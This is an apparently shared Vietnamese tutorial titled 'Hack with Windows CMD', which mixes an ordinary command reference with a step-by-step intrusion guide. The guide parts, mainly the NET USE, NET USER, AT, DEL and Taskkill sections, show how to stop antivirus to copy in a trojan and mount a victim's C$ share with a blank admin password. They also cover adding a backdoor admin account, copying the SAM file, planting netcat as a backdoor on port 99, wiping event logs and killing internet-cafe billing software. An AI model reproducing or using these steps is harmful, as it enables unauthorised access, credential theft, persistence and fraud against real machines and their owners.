Upload
nguoi-co-don
View
166
Download
4
Embed Size (px)
Citation preview
Hack bằng CMD của windows
NET là lệnh nội trú của Windows 2003, XP nên anh em không cần phải đi tìm nó ở đâu hết, cứ gõ là chạy. Chức năng của lệnh này được phân ra theo một số nhóm sau:
1. Managing Services: Quản lý dịch vụNET - START, STOP, PAUSE, CONTINUE
2. Managing File Shares and Printer Shares: Kiểm sóat, chia xẻ tài nguyênNET - SHARE, VIEW, USE, FILE, SESSIONS
3. Managing Network Print jobs and Network Time: Kiểm sóat tác vụ in ấn và thời gian vào mạngNET - TIME, PRINT
4. Managing Security: Kiểm sóat bảo mật hệ thốngNET - ACCOUNTS, USER, GROUP, LOCALGROUP
5. Network Messaging: Giao dịch nhắn tin trong mạngNET - NAME, SEND
6. Managing Network configuration: Quản lý cấu hình của mạngNET - COMPUTER, CONFIG_WORKSTATION, CONFIG_SERVER, STATISTICS_WORKSTATION, STATISTICS_SERVER
Bây giờ tôi xin đi vắn tắt một số lệnh của NET theo từng nhóm.
1. Managing service:
Cú pháp của lệnh như sau:
NET START [service]NET STOP [service]NET PAUSE [service]NET CONTINUE [service]
Trong đó [service] chính là từ khóa hiển thị trong phần service của Control Panel
Bốn lệnh START, STOP, PAUSE và CONTINUE tương ứng với KHỞI ĐỘNG, DỪNG, TẠM NGỪNG, TIẾP TỤC cái service mà
anh em sẽ chỉ định cho nó thực thi. Để biết tên của các service đang chạy, anh em gõ vào dòng lệnh:
NET START
Lệnh này liệt kê tên đầy đủ của các service đang chạy. Muốn dừng chúng thì phải gõ NET STOP [service] với tên service viết gọn giống như trong Control Panel. Ví dụ
anh em đang dùng Norton Antivirus, rủi có chép một trình nào đó như Brutus chẳng hạn thì nó cứ nhảy ra và la lên là cái file đó có trojan bên trong. Thế là nó không cho anh em chép vào máy của mình. Bây giờ gõ lệnh sau:
NET STOP navapsvc
Màn hình sẽ hiện ra
The Norton AntiVirus Auto Protect Service service is stopping.The Norton AntiVirus Auto Protect Service service was stopped successfully.
Bây giờ anh em ngó xuống cái icon của NAV phía dưới System Tray thì thấy nó bị gạch chéo (disabled) rồi. Đó là do mình tắt bằng NET STOP.
2. Managing File Shares and Printer Shares: Kiểm sóat, chia xẻ tài nguyênLệnh NET này đi kèm một số tham số sau: SHARE, VIEW, USE, FILE, SESSIONS
SHARE - hiển thị những chia xẻ trên máy, ví dụ
Share name Resource Remark
-----------------------------------------------------------IPC$ Remote IPCD$ D:\ Default shareF$ F:\ Default shareADMIN$ E:\WINDOWS Remote AdminC$ C:\ Default shareE$ E:\ Default shareThe command completed successfully.
Các share có dấu $ là chia xẻ tài nguyên ở mức hệ thống cho admin, thường gọi là share ẩn.
VIEW - hiển thị tất cả các máy trong cùng domain hoặc workgroup
Server Name Remark
-----------------------------------------
\\CPQ25981604619 DTLong\\DEFAULT-EBGQAMU\\FERRARI Formula 1\\JITH\\JOE-VT6094JJ9\\KACE\\KENGCOM KengCOM\\LOTUSThe command completed successfully.
Bây giờ ta bàn cách chiến đấu một số máy để tìm tài nguyên. Lệnh Net View cho
phép xem tài nguyên chia xẻ của các máy cùng subnet. Cú pháp câu lệnh như sau:
NET VIEW [tên máy]
Ví dụ: NET VIEW \\KACE
Nếu máy này có chia xẻ tài nguyên, màn hình sẽ hiện ra tên của các share directory, lúc này ta chỉ việc phát lệnh sử dụng tài nguyên đó mà thôi.
Để chiếm dụng tài nguyên chia xẻ, anh em có thể dùng My Network Places / Network Neighborhood để truy nhập vào, ở đây ta dùng lệnh NET USE thay cho việc dùng My Network Places
NET USE * \\tên máy\tên sharehoặcNET USE xxx.xxx.xxx.xxx
Trong đó tên máy là tên hiện ra qua lệnh NET VIEW. Trường hợp sử dụng IP của máy trong NET USE, anh em phải gõ IP vào.
Để biết IP của máy nạn nhân, có thể lace w:st="on">PINGlace> vào tên của máy. Ví dụ
PING LOTUSPinging lotus [202.129.41.106] with 32 bytes of data:
Reply from 202.129.41.106: bytes=32 time<1ms TTL=128Reply from 202.129.41.106: bytes=32 time<1ms TTL=128Reply from 202.129.41.106: bytes=32 time<1ms TTL=128Reply from 202.129.41.106: bytes=32 time<1ms TTL=128
Ping statistics for 202.129.41.106:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms
Như vậy, máy LOTUS có địa chỉ IP là 202.129.41.106
Trong lệnh NET USE, dấu * có nghĩa là lấy tên một ổ đĩa bất kỳ (từ A-Z) rồi ánh xạ share đó vào ổ đĩa tùy chọn ấy. Nếu trên LOTUS có share một thư mục là SharedDocs thì lúc này lệnh NET USE dùng như sau:
NET USE * \\LOTUS\SharedDocs
hoặc
NET USE * \\202.129.41.106\SharedDocs
Sau khi thành công, SharedDocs biến thành ổ đĩa Z (chẳng hạn) trên máy của anh em.
Có thể chiếm dụng sâu hơn vào trong tài nguyên ẩn của máy. Lệnh gõ như sau:
NET USE * \\202.129.41.106\C$
Nếu lệnh này thành công, ổ C của máy nạn nhân sẽ "bay" về máy anh em như một ổ đĩa của mình vậy. Dùng như trên máy mình và cũng có thể xóa lung tung như nó là của mình vậy. Tương tự, phỏng đoán máy nạn nhân có thể có vài ổ đĩa như D, E, F, anh em có thể thử lệnh trên với D$, E$, F$, G$ tới khi nào nó báo lỗi thì tức là ổ đĩa đó không có trên máy của nạn nhân.
Thường thì các share ẩn này share cho account admin nên khi mình gõ lệnh đó nó sẽ hỏi Username và Password. Nếu đoán được Username (ví dụ: LOTUS) thì gõ vào rồi cũng đóan luôn mật khẩu nhé (hơi khó đấy), bằng không thì anh em nhập Administrator vào cho Username, còn để password là rỗng (sau khi nhập Username thì gõ ENTER tiếp cho phần mật khẩu). Nếu may mắn tiếp thì có thể thóat qua được. Trường hợp này là do admin máy đó sơ sẩy không đổi password mặc định của Windows sau khi cài hệ điều hành. Và như vậy anh em có thể ung dung chiếm tài nguyên của nạn nhân rồi. Anh em sẽ đi du lịch trong máy nạn nhân, chép bất cứ cái gì anh em thích như là đang trên máy mình vậy. Tuy nhiên cơ hội thành công là rất thấp. Vì thế, lệnh NET USE này thường chỉ phát huy tác dụng cao với các máy có share tài nguyên cho mọi người (ví dụ như SharedDocs).
Lưu ý, có một mẹo nhỏ. Nếu anh em chiếm được quyền admin với account Administrator và password rỗng rồi thì anh em có thể dùng con Hyena tạo ra một account cho mình trên máy nạn nhân, đề phòng trong tương lai chúng cài service pack thì NET USE hết đường làm ăn. Lúc đó có con account kia rồi dễ bề tung hoành hơn.
Mấy lệnh trên là những lệnh chính thường dùng. Các lệnh còn lại xin anh em tham khảo thêm trên mạng nhé. Chúng đơn giản nói ra sợ anh em mất thời gian đọc.
Đoạn cuối của phần này xin được giới thiệu cùng anh em các câu lệnh về máy in và kiểm sóat thời gian.
3. Managing Network Print jobs and Network Time:TIME, PRINT
Lệnh NET TIME cho biết thời gian của đồng hồ trên máy mạng. Câu lệnh là:
NET TIME \\tên máy
Ví dụ: NET TIME \\LOTUS
Lệnh này có nhiều biến thể khác, anh em chịu khó tham khảo. Tôi giới thiệu thêm về lệnh đồng bộ hóa đồng hồ máy mình với máy chủ trên mạng, cú pháp như sau:
NET TIME \\servername /SET /YES
Trong đó servername là tên của máy chủ
Lệnh NET PRINT có cú pháp như sau: NET PRINT \\ComputerName\ShareName
Hiển thị tác vụ hiện thời trên máy in, giống như việc xem xét thông qua Printer Manager xem có những tài liệu nào đang được máy in đó in ra.
ComputerName là tên máy chủ có share máy inShareName là tên share của máy in đó.
Để tạm ngưng (PAUSE) một lệnh in, có thể dùng lệnh sau
NET PRINT [\\ComputerName] job# /HOLD
ComputerName là tên máy có share printer còn job# tương đương số thứ tự của tài liệu in trên danh sách các tài liệu đang được in (1,2,3,4...)
Để tiếp tục in sau khi lệnh HOLD được thi hành, gõ vào lệnh
NET PRINT [\\ComputerName] job# /RELEASE
Để xóa, delete một lệnh in, ví dụ trong trường hợp in nhầm một văn bản lớn, anh em có thể gõ lệnh
NET PRINT [\\ComputerName] job# /DELETE
Cách nối nhiều file lại với nhau bằng lệnh trong CMD
Thủ thuật ngắn sau sẽ júp bạn nối nhiều file lại với nhau bằng dòng lệnh. Câu lệnh như sau:
copy /b "tên tập tin 1" + tên tập tin 2" + "tên tập tin 3" + .... + "tên tập tin n" "Tên tập tin xuất ra"
Tên tập tin có thể là đường dẫn đến file. VD: E:\Media\ChauTinhTri.avi.001
VD: muốn nối 3 tập tin: phim.avi.001, phim.avi.002; phim.avi.003 xuất ra flie "Doi bong Thieu Lam.avi" lệnh như sau:
copy /b "phim.avi.001" + "phim.avi.002" + "phim.avi.003" "Doi bong Thieu Lam.avi"
Rất đơn giản phải không, chúc tất cả vui vẻ nha
Ẩn file bằng CMD
Attrib +s +h +r đường dẫn
Làm hiện ẩn
Attrib –s –h –r đường dẫn
Lệnh CMD trong Windows
Click Start-->Run---> type cmd ---> press enter1. Lệnh Ping :Cú pháp:Code:
ping ip/host [/t][/a][/l][/n]
- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm tra. Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính.- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tính đích, cho đến khi bạn bấm Ctrl + C- Tham số /a: Nhận địa chỉ IP từ tên host- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra. Một số hacker sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt.- Tham số /n : Xác định số gói tin sẽ gửi đi. Ví dụ: ping 174.178.0.1/n 5Công dụng :+ Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không. Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích. Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thể xác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)). Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)....
2. Lệnh Tracert :Cú pháp :Code:
tracert ip/host
Công dụng :+ Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào... Quá hay nếu bạn muốn thăm dò một server nào đó.
3. Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP):Cú pháp:
Net send ip/host thông_điệp_muốn_gởiCông dụng:+ Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi.+ Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau. Trong phòng vi tính của trường tui thường dùng lệnh này để ghẹo mọi người! Bạn cũng có thể gởi
cho tất cả các máy tính trong mạng LAN theo cấu trúc sau :Code:
Net send * hello!I'm pro_hacker_invn
4. Lệnh Netstat :Cú pháp:Code:
Netstat [/a][/e][/n]
- Tham số /a: Hiển thị tất cả các kết nối và các cổng đang lắng nghe (listening)- Tham số /e: hiển thị các thông tin thống kê Ethernet- Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối...Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêmCông dụng :+ Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta.
5. Lệnh IPCONFIG :Cú pháp:Code:
ipconfig /all
Công dụng:+ Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng...
6. Lệnh FTP (truyền tải file):Cú pháp:Code:
ftp ip/host
Nếu kết nối thành công đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau:Code:
ftp>_
Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu Cute FTP, Flash FXP.Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password. Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file... trên máy chủ.Một số lệnh ftp cơ bản:
-cd thu_muc: chuyển sang thư mục khác trên máy chủ- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ- mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ
- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ- put file: tải một file file (đầy đủ cả đường dẫn. VD: c:\tp\bin\baitap.exe) từ máy bạn đang sử dụng lên máy chủ.- close: Đóng phiên làm việc- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.Ngoài ra còn một vài lệnh nữa, xin mời các bạn tự tìm hiểu.Công dụng :+ FTP là một giao thức được sử dụng để gửi và nhận file giữa các máy tính với nhau. Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp
7. Lệnh Net View :Cú pháp:Code:
Net View [\\computer|/Domain[:ten_domain]]
Công dụng:+ Nếu chỉ đánh net view [enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với máy tính bạn đang sử dụng.
+ Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia sẻ tài nguyên của máy tính tenmaytinh . Sau khi sử dụng lệnh này, các bạn có thể sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này.
8. Lệnh Net Use :Cú pháp:Code:
Net use \\ip\ipc$ "pass" /user:"######"
- ip: địa chỉ IP của victim.- ######: user của máy victim- pass: password của userGiả sử ta có đc user và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 . Ta dùng lệnh sau:Code:
Net use \\68.135.23.25\ipc$ "12345" /user:"victim"
Công dụng:+ kết nói một IPC$ đến máy tính victim (bắt đầu quá trình xâm nhập).
9. Lệnh Net User :Cú pháp:Code:
Net User [username pass] [/add]
- Username : tên user cấn add- pass : password của user cần addKhi đã add đc user vào rùi thì ta tiến hành add user này vào nhóm administrator.Code:
Net Localgroup Adminstrator [username] [/add]
Công dụng:+ Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính.+ Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào.Ví dụ: ta tiến hành add thêm một user có tên là :xuanhoa , password là :banvatoi vào với cấu trúc lệnh như sau:Code:
Net User xuanhoa banvatoi /add
Sau đó add user xuanhoa vào nhóm adminnistratorCode:
Net Localgroup Administrator xuanhoa /add
10. Lệnh Shutdown:Cú pháp:Code:
Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up:xx:yy] (áp dụng cho win XP)
- Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,..- Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown.- Tham số -l : logg off (lưu ý ko thể thực hiện khi remote)- Tham số -s : shutdown- Tham số -r : shutdown và restart- Tham số -a : không cho shutdown- Tham số -f : shutdown mà ko cảnh báo- Tham số -c "comment" : lời cảnh báo trước khi shutdown- Tham số -d up:xx:yy : ko rõCode:
shutdown \\ip (áp dụng win NT)
Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn!Công dụng:+ Shutdown máy tính.
11. Lệnh DIR :Cú pháp:
Code:
DIR [drive:][path][filename]
Lệnh này quá căn bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn.Công dụng:+ Để xem file, folder.
12. Lệnh DEL :Cú pháp:Code:
DEL [drive:][path][filename]
Lệnh này cũng căn bản rùi, ko phải nói nhìu.Công dụng:Xóa một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT:Code:
del C:\winnt\system32\logfiles\*.*del C:\winnt\ssytem32\config\*.evtdel C:\winnt\system32\dtclog\*.*del C:\winnt\system32\*.logdel C:\winnt\system32\*.txtdel C:\winnt\*.txtdel C:\winnt\*.log
13. Lệnh tạo ổ đĩa ảo trên computer:Cú pháp:Code:
Net use z: \\ip\C$ ( hoặc là IPC$ )
- Z là của mình...còn C$ là của VictimCông dụng:Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14. Lệnh Net Time :Cú pháp:Code:
Net Time \\ip
Công dụng:+ Cho ta biết thời gian của victim, sau đó dùng lệnh AT để khởi động chương trình.
15. Lệnh AT:Cú pháp:
Code:
AT \\ip
Công dụng:+ Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ tặng quà lưu niệm lên máy tính victim, khi đã copy troj hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng.Ví dụ: ở đây tui có con troj tên nc.exe (NC là từ viết tắc của NETCAT....nó là một telnet server với port 99) và đc copy lên máy victim rùi. Đầu tiên ta cần biết thời gian của victim có IP là : 68.135.23.25 .Code:
Net Time \\68.135.23.25
Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00.Code:
AT \\68.135.23.25 12:3 nc.exe
Đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99.
16. Lệnh Telnet:Cú pháp:Code:
telnet host port
Gõ telnet /? để biết thêm chi tiết. Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port 99 là OKieCode:
telnet 68.135.23.25 99
Công dụng:+ Kết nối đến host qua port xx
17. Lệnh COPY:Cú pháp:Code:
COPY /?
Dùng lệnh trên để rõ hơn!Công dụng:+ Copy file, tui khỏi nói thêm nhé.Ví dụ:chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1Code:
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNtCode:
Copy index.html \\127.0.0.1\admin$\index.html
muốn copy files trên máy victm thì bạn gõ vào :Code:
Copy \\127.0.0.1\Admin$\repair\sam._c:\
18. Lệnh SET:Cú pháp:Code:
SET
Công dụng:+ Displays, sets, or removes cmd.exe enviroment variables.
19. Lệnh Nbtstat:Cú pháp:Code:
Nbtstat /?
Gõ lệnh trên để rõ hơn về lệnh này.Công dụng:+ Display protocol statistic and curent TCP/IP connections using NBT (netbios over TCP?IP)
20. Lệnh Date :Cú pháp:
Code:Date /TCông dụng:+ Nếu chỉ gõ lệnh date thì hệ thống sẽ hiển thị ngày giờ hệ thống và yêu cầu bạn nhập ngày giờ mới để edit.+ Nếu gõ lệnh date /t thì bạn chỉ coi thông tin về ngày giờ hệ thống!
21. Lệnh xuất thông tin thành file *.txt:Cú pháp:
Code:Câu lệnh >[drive]:\[path]\tenfile.txtCông dụng:+ xuất một tham số nào đó ra 1 file text .Ví dụ: bạn đánh lệnh sau:
Code:
ipconfig >C:\myip.txtHệ thống sẽ tạo ra file myip.txt lưu ở ổ đĩa C với thông tin là IP, Gateway, Subnet Mask
22. Lệnh openfiles:Cú pháp:
Code:OpenFiles /Disconnect /ID id hoặc OpenFiles /Disconnect /A tên-truy-cậpCông dụng:+ Cho biết ai đang dùng các tập tin (thư mục) mà bạn đang chia sẽ trên hệ thống mạng
23. Lệnh Recover:Cú pháp:
Code:Recover /?Đánh lệnh recover /? để biết thêm chi tiết nhé!Công dụng:+ Để "cứu" một file nào đó bị hỏng khi file đó nằm trên vùng đĩa hư (bad sector chăng hạn). Chỉ hoạt động khi hệ thống file của bạn là NTFS (Fat32/Fat không dùng được đâu nhé). Nó dở 1 chỗ là dùng lệnh này cho từng file một nên có nhiều file hư các bạn nên tìm tiện ích của các hãng thứ 3
24. Lệnh Tasklist :Cú pháp:
Code:TasklistCông dụng:+ Liệt kê các tác vụ (các chương trình ứng dụng đang chạy trong bộ nhớ máy tính) chi tiết. Sẽ cho bạn biết tên process đang chạy. Process là một luồng xử lý được CPU cấp riêng khi thực thi một ứng dụng (chương trình) hay PID (Process ID). TaskList hữu ích khi dùng với Taskkill.+ Để hiểu rõ hơn về lệnh này, hãy gõ /? sau cấu trúc lệnh nhé!
25. Lệnh Taskkill:Cú pháp:
Code:Taskkill /PID proccess idĐừng quên thêm /? sau cấu trúc lệnh để hiểu rõ hơn nhé!Công dụng:+ Để "kill" một "task" đang chạy trong bộ nhớ. Lợi hại lắm đấy, khi ra net gặp quán nào nó cái DWK hay Netcafe thì mình tắt nó đi cái một!Ví dụ:Đầu tiên ta dùng lệnh tasklist để biết được groccess id của chương trình cần tắt.
Code:tasklistỞ đây tôi thí dụ như tôi cần DWK có groccess id là 524 thì ta dùng lệnh taskkill để tắt nó đi như sau:
Code:taskkill /PID 524 /ftham số /f là để tắt ứng dụng đó đi một cách hoàn toàn! Gọi là tắt
hoàn toàn vậy thui chứ minh run hoặc khởi đọng lại là nó vẫn chạy bình thường ah! Lợi dụng ứng dụng này ta có thể làm giảm bớt chi phí ngồi net bằng cách tắt easy cafe đi. Chừng nào gần về rùi hãy mở lại hoặc nhấn nút reset là xong! He he! Nhưng nhớ phải làm cho khéo kẻo bị đập đó!
26. Lệnh Compact:Cú pháp:Compact [/c] [/u] [/s] [/a] [/i] [/f] [/q]- tham số /c : chỉ định nén một file nào đó- tham số /u : giải nén một file nào đó- Các tham số còn lại tự ngâm cứu thêm nhé!Công dụng:+ Tương tự như chức năng tiết kệm dung lượng đĩa trên Windows XP hay 2003 (Vista) - chỉ có khi dùng NTFS là "Compress Contents To Save Disk Space". Các bạn có nhiều kiểu làm như click phải chuột vào một file chọn Properties -> Advanced rồi check vào ô tiết kiệm dung lượng cho file này "Compress file to save disk space". Nhưng khi các bánj muốn nén tất các file có phần mở rộng là *.* thì Compact là lựa chọn tốt nhất .Ví dụ:
Code:compact /c *.exe27. Lệnh control:Cú pháp:
Code:controlCông dụng:+ Mở control panel bằng CMD
28. Lệnh getmac:Cú pháp:
Code:getmacCông dụng:+ lấy thông tin địa chỉ MAC (Media Access Control) từ card mạng.
29. Lệnh systeminfo:Cú pháp:
Code:systeminfoCông dụng:+ hiện thị thông tin của hệ thống từ cấu hình cơ bản, loại CPU, khu vực địa lý, các bản hotfix (bản cập nhập) đã cài trong máy, v.v...
30. Lệnh tree:Cú pháp:
Code:tree [ổ đĩa]:[đường dẫn] [/f] [/a]- Tham số /f : hiển thị tên của file trong mỗi thư mục- Tham số /a : ko rõ
Công dụng:+ Hiển thị cấu trúc thư mục dạng cây!
http://www.wattpad.com/214547-117-câu-lệnh-cmd-và-1-số-lệnh-trong-run?p=2117 câu lệnh CMD và 1 số lệnh trong Run
Đây là 1 số lệnh:
1. Character Map = charmap.exe (rất hữu dụng trong việc tìm kiếm các ký tự không thông dụng)
2. Disk Cleanup = cleanmgr.exe (dọn dẹp đĩa để tăng dung lượng trống)
3. Clipboard Viewer = clipbrd.exe (Xem nội dung của Windows clipboard)
4. Dr Watson = drwtsn32.exe (Công cụ gỡ rối)
5. DirectX diagnosis = dxdiag.exe (Chẩn đoán và thử DirectX, card màn hình & card âm thanh)
6. Private character editor = eudcedit.exe (cho phép tạo ra hoặc sửa đổi các ký tự(nhân vật?))
7. IExpress Wizard = iexpress.exe (Tạo ra các file nén tự bung hoặc các file tự cài đặt)
8. Mcft Synchronization Manager = mobsync.exe (cho phép đồng bộ hóa thư mục trên mạng cho làm việc Offline.
Không được cung cấp tài liệu rõ ràng).
9. Windows Media Player 5.1 = mplay32.exe (phiên bản cũ của Windows Media Player, rất cơ bản).
10. ODBC Data Source Administrator = odbcad32.exe (Làm một số việc với các cơ sở dữ liệu)
11. Object Packager = packager.exe (Làm việc với các đối tượng đóng gói cho phép chèn file vào, có các file trợ
giúp toàn diện).
12. System Monitor = perfmon.exe (rất hữu ích, công cụ có tính cấu hình rất cao, cho bạn biết mọi thứ bạn muốn biết
về bất kỳ khía cạnh nào của hiệu suất PC, for uber-geeks only )
13. Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14. Remote Access phone book = rasphone.exe (Tài liệu là ảo, không tồn tại).
15. Registry Editor = regedt32.exe [also regedit.exe] (dành cho việc chỉnh sửa Windows Registry).
16. Network shared folder wizard = shrpubw.exe (Tạo các thư mục được chia sẻ trên mạng).
17. File siganture verification tool = sigverif.exe
18. Volume Contro = sndvol32.exe (Tôi bổ sung cái này cho những người bị mất nó từ vùng cảnh báo của hệ thống).
19. System Configuration Editor = sysedit.exe (Sửa đổi System.ini & Win.ini giống như Win98! ).
20. Syskey = syskey.exe (bảo mật cơ sở dữ liệu tài khoản WinXP - cẩn thận khi sử dụng, Nó không được cung cấp
tài liệu nhưng hình như nó mã hóa tất cả các mật khẩu, Tôi không chắc về chức năng đầy đủ của nó).
21. Mcft Telnet Client = telnet.exe
22. Driver Verifier Manager = verifier.exe (có vẻ như là một tiện ích theo dõi hoạt động của các Driver(trình điều
khiển) phần cứng ,có thể hữu ích đối với người gặp sự cố với các Driver. Khộng được cung cấp tài liệu)
23. Windows for Workgroups Chat = winchat.exe (Xuất hiện như là 1 tiện ích WinNT cũ cho phép chat trong mạng
LAN,có file trợ giúp).
24. System configuration = msconfig.exe (Có thể sử dụng để quản lý các chương trình khởi động cùng với Windows)
25. gpedit.msc được sử dụng để quản lý các chính sách nhóm và các quyền hạn.
here are more 99 commands
Accessibility Controls: access.cpl
Add Hardware Wizard: hdwwiz.cpl
Add/Remove Programs:cappwiz.cpl
Administrative Tools: control admintools
Automatic Updates: wuaucpl.cpl
Bluetooth Transfer Wizard: fsquirt
Calculator: calc
Certificate Manager: certmgr.msc
Character Map: charmap
Check Disk Utility:chkdsk
Clipboard Viewer: clipbrd
Command Prompt: cmd
Component Services: dcomcnfg
Computer Management: compmgmt.msc
Date and Time Properties: timedate.cpl
DDE Shares: ddeshare
Device Manager: devmgmt.msc
Direct X Control Panel (If Installed)*: directx.cpl
Direct X Troubleshooter: dxdiag
Disk Cleanup Utility: cleanmgr
Disk Defragment: dfrg.msc
Disk Management: diskmgmt.msc
Disk Partition Manager: diskpart
Display Properties: control desktop
Display Properties: desk.cpl
Display Properties (w/Appearance Tab Preselected): control color
Dr. Watson System Troubleshooting Utility: drwtsn32
Driver Verifier Utility: verifier
Event Viewer: eventvwr.msc
File Signature Verification Tool: sigverif
Findfast: findfast.cpl
Folders Properties: control folders
Fonts: control fonts
Fonts Folder: fonts
Free Cell Card Game: freecell
Game Controllers: joy.cpl
Group Policy Editor (XP Prof): gpedit.msc
Hearts Card Game: mshearts
Iexpress Wizard: iexpress
Indexing Service: ciadv.msc
Internet Properties: inetcpl.cpl
IP Configuration (Display Connection Configuration): ipconfig /all
IP Configuration (Display DNS Cache Contents): ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents): ipconfig /flushdns
IP Configuration (Release All Connections): ipconfig /release
IP Configuration (Renew All Connections): ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS): ipconfig /registerdns
IP Configuration (Display DHCP Class ID): ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID): ipconfig /setclassid
ava Control Panel (If Installed): jpicpl32.cpl
Java Control Panel (If Installed): javaws
Keyboard Properties: control keyboard
Local Security Settings: secpol.msc
Local Users and Groups: lusrmgr.msc
Logs You Out Of Windows: logoff
Microsoft Chat: winchat
Minesweeper Game: winmine
Mouse Properties: control mouse
Mouse Properties: main.cpl
Network Connections: control netconnections
Network Connections: ncpa.cpl
Network Setup Wizard: netsetup.cpl
Notepad: notepad
Nview Desktop Manager (If Installed): nvtuicpl.cpl
Object Packager: packager
ODBC Data Source Administrator: odbccp32.cpl
On Screen Keyboard: osk
Opens AC3 Filter (If Installed): ac3filter.cpl
Password Properties: password.cpl
Performance Monitor: perfmon.msc
Performance Monitor: perfmon
Phone and Modem Options: telephon.cpl
Power Configuration: powercfg.cpl
Printers and Faxes: control printers
Printers Folder: printers
Private Character Editor: eudcedit
Quicktime (If Installed): QuickTime.cpl
Regional Settings: intl.cpl
Registry Editor: regedit
Registry Editor: regedit32
emote Desktop: mstsc
Removable Storage: ntmsmgr.msc
Removable Storage Operator Requests: ntmsoprq.msc
Resultant Set of Policy (XP Prof): rsop.msc
Scanners and Cameras: sticpl.cpl
Scheduled Tasks: control schedtasks
Security Center: wscui.cpl
Services: services.msc
Shared Folders: fsmgmt.msc
Shuts Down Windows: shutdown
Sounds and Audio: mmsys.cpl
Spider Solitare Card Game: spider
SQL Client Configuration: cliconfg
System Configuration Editor: sysedit
System Configuration Utility: msconfig
System File Checker Utility (Scan Immediately): sfc /scannow
System File Checker Utility (Scan Once At Next Boot): sfc /scanonce
System File Checker Utility (Scan On Every Boot): sfc /scanboot
System File Checker Utility (Return to Default Setting): sfc /revert
System File Checker Utility (Purge File Cache): sfc /purgecache
System File Checker Utility (Set Cache Size to size x): sfc /cachesize=x
System Properties: sysdm.cpl
Task Manager:taskmgr
Telnet Client:telnet
User Account Management:nusrmgr.cpl
Utility Manager:utilman
Windows Firewall:firewall.cpl
Windows Magnifier:magnify
Windows Management Infrastructure:wmimgmt.msc
Windows System Security Tool:syskey
Windows Update Launches:wupdmgr
Windows XP Tour Wizard:tourstart
Wordpad:write hoặc wordpad